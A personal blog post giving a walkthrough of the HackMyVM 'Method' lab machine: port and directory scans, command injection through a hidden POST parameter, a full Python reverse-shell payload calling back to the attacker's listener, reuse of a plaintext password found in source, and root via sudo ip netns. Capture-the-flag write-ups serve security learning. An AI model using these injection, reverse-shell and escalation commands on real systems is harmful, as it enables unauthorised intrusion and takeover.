Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Method Walkthrough

HackMyVm Method Walkthrough

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80, remember to enable .htm ext.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b 
 401,403,404,500 --wildcard   -o 80.log --exclude-length 3690
 ===============================================================
 /index.htm            (Status: 200) [Size: 344]
 /note.txt             (Status: 200) [Size: 23]
 /secret.php           (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]

Check source code of index.htm.

 ~ curl http://192.168.56.100/index.htm                                                                                                   fish-0 | 0 [09:45:55]
 <h1>It's Hacking Time</h1>
 <img src="hacker.gif" alt="Hacker" height="640" width="640">
 <img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
 <form action="/secret.php" hidden="true" method="GET">
      <input type="text" name="HackMyVM" value="" maxlength="100"><br>
      <input type="submit" value="Submit">
 </form>

With the hint from index.htm, we can call secret.php with param HackMyVM.

 ~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'  
 Now the main part what it is loooooool<br>Try other method⏎

Seem get method is no correct. Let's try post method.

 ~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=id'     
 You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
 </pre>⏎                  

Then we can get reverse shell.

 ~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────
 
 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check source code of secret.php

 www-data@method:~/html$ cat secret.php
 cat secret.php
 <?php
 ...
 else {
 header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
 }
 $ok="prakasaka:th3-!llum!n@t0r";
 ?>
 

Escalate to user prakasaka.

 www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in ssh as user prakasaka, check sudo -l.

 prakasaka@method:~$ sudo -l
 Matching Defaults entries for prakasaka on method:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User prakasaka may run the following commands on method:
     (!root) NOPASSWD: /bin/bash
     (root) /bin/ip

We can get root.

 prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh
 
 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1